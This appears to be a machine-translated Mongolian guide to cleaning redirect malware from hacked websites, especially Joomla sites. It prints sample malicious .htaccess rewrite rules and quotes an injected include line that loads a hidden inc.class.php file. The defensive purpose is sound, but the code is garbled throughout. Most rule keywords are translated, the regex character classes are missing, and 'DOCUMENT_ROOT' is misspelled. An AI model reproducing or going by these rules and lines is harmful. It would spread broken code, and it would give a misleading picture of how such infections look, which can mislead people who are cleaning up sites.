Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)&.*=-+$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)&.*=+$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*\/$ ?$1$3=$4&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)(.*)+%+%+.*-S.*..*$ ?$2$1=$3&%(QUERY_STRING)[ L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)..*$ ?$1$3=$2&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%([^\d\/]+ )([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+)+ %+([^\d\/]+)\/$ ?$15$1=$14&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)-+\/$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)-.*\/\?.*=+$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)-.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]

Хэрэв та үүнтэй төстэй зүйлийг олж харвал, хэрэв та ямар мөр үлдэх боломжтой гэдэгт эргэлзэж байвал үүнийг аюулгүйгээр устгаж болно, дараа нь CMS-ийн стандарт файлыг аваарай - тэнд вирус байхгүй болно!

Ихэвчлэн гар утас болон таблет төхөөрөмжөөс хүсэлт гаргахад дахин чиглүүлэлт хийдэг.

түүнчлэн хайлтын системээс шилжихэд:

yandex|google|мэйл|rambler|vk.com

Хэрэв энэ цэг тус болохгүй бол хуудасны кодыг анхаарч үзэх хэрэгтэй - заримдаа дахин чиглүүлэлт нь Javascript-ээр нэмэгддэг.

Хортой кодоос ангижрахын тулд бүгдийг нь их хэмжээгээр солих шаардлагатай болж магадгүй юм .jsфайлууд.

Индекс файлууд болон загварын хавтсыг шалгахаа мартуузай - эдгээр нь хакеруудын вирусын хамгийн дуртай газар юм. Файлуудыг ялангуяа анхааралтай уншина уу index.php, footer.php, head.php, header.php- Сүүлийн үед вирусыг дотор нь биш, харин холбоос хэлбэрээр байрлуулах нь түгээмэл болсон. Тиймээс командуудыг ашиглан аль файлыг ачаалж байгааг сайтар шалгаарай оруулахТэгээд шаарддаг.

Хамгийн боловсронгуй оруулгууд нь ачаалах боломжтой модуль, залгаасууд болон бүрэлдэхүүн хэсгүүдэд хийгдсэн байдаг. Энэ нь тусад нь хэрэгжсэн модулиуд байж болно (ялангуяа админ самбар хакердсан бол), эсвэл зүгээр л мэдэгдэж байгаа, алдартай өргөтгөлүүдийн файлд шифрлэгдсэн код оруулах боломжтой.

Жишээлбэл, сүүлийн үед би нэгээс олон сайттай танилцаж байна Жумла(ялангуяа дээр Joomla 2.5), замын дагуу хаана орно/inc.class.phpвирус өөрөө байрлаж байгаа бөгөөд дараах мөрийг нэг хавтсанд байгаа application.php файлд оруулна

require_once($_SERVER["BACUMENT_ROOT"]."/includes/inc.class.php");

Ихэвчлэн үүнтэй зэрэгцдэг номын сан/joomla/програм joomla-app.php нэртэй дахин чиглүүлэх вирус байдаг

Ямар ч тохиолдолд, хэрэв та сайт дээрх гуравдагч этгээдийн сайт руу дахин чиглүүлэхийг анзаарсан бол аюулгүй байдлын арга хэмжээ авч, сайтыг бүхэлд нь шалгах хэрэгтэй. Хэрэв та өөрөө үүнийг даван туулж чадахгүй бол вирус устгах, вэбсайтыг хамгаалах мэргэжилтэнтэй холбоо барих нь гарцаагүй.